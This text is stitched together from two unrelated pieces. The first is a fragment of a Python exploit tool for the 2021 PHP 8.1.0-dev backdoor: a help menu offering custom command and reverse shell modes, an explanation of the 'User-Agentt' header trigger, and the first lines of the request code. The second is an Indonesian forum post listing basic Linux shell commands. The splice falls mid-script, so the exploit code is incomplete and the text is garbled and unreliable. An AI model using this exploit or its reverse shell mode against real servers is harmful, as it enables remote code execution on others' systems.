Options:
-c Custom command mode. Provide command to execute.
-s Reverse shell mode. Provide local IP and port.
-i Path to custom JPEG image. (Optional)
-h Show this help menu.
""")
An early release of PHP, the PHP 8.1.0-dev version was released with a backdoor on March 28th 2021, but the backdoor was quickly discovered and removed. If this version of PHP runs on a server, an attacker can execute arbitrary code by sending the User-Agentt header.
The following exploit uses the backdoor to provide a pseudo shell ont the host.
"""
#!/usr/bin/env python3
import os
import re
import requests
host = input("Enter the full host url:\n")
request = requests.Session()
response = request.get(host)
Posted by: fa - 07-28-2022, 14:54 - Forum: Linux
- No Replies
#Perintah Dasar Yang Wajib#
#(login pada server)
Digunakan untuk login sebagai user lain, namun harus menjadi root dulu untuk bisa menjalankan perintah ini.
Sintaks : login namauser
#(masuk pada mode root)
Digunakan untuk masuk ke super user
sintaks : sudo su
#(melihat tanggal saat ini)
berfungsi untuk menampilkan tanggal dan waktu
sintaks: date
#(melihat panduan manual suatu command)
Digunakan untuk melihat tutorial command
sintaks : man gunzip
#(pindah folder)
Digunakan untuk pindah folder
sintaks : cd /opt/
#(membuat folder)
Digunakan untuk membuat folder
sintaks : mkdir test
sintaks : mkdir -p data/penting (membuat folder anakan)
#(melihat isi dari folder)
Digunakan untuk menampilkan isi folder
sintaks : ls -al
#(melihat lokasi kita ada di folder mana)
Digunakan untuk mengetahui ada di mana
sintaks : pwd
#(membuat file kosong)
Digunakan untuk membuat file
sintaks : touch coba.txt
#(mengedit dan membuat file)
Digunakan untuk mengedit file
sintaks : nano coba.txt
#(menampilkan isi dari sebuah file)
Digunakan untuk melihat isi file
sintaks : more coba.txt
#(meghapus file dan folder)
Digunakan untuk menghapus file dan folder
sintaks : rm -rf tio.txt
#(mencopy folder ataupun file)
berfungsi untuk menyalin sebuah file ataupun folder
sintaks copy file : cp file.text file.txt
sintaks copy folder: cp -r tio/ data/penting
#(memindahkan dan mengganti nama suatu file atau folder)
Berfungsi untuk memindahkan file atau folder, juga bisa untuk mengganti nama
sintaks rename : mv tio oit
sintaks pindahkan : mv tio.txt data/penting
#(ekstrak file format .gz .z .zip)
berfungsi untuk meng-uncompress sebuah file zip (*.gz” or *.z). dengan menggunakan gzip (juga zip atau compress) jika anda menginginkan mengompress file
sintaks: gunzip hdsentinel-018c-x64.gz
#(ekstrak file format .tar.gz .tgz)
berfungsi untuk meng-untar sebuah file tar sekaligus meng-uncompress file tersebut (*.tar.gz atau *.tgz)
sintaks : tar –zxvf namafile.tgz
#(membersihkan hasil command)
berfungsi untuk membersihkan bekas perintah
sintaks : clear
#(melihat history command yang sudah kita jalani)
berfungsi untuk melihat history perintah
sintaks : history
#(merestart dan shutdown server)
bisa untuk restart dan shutdown server
restart : init 6
shutdown : init 0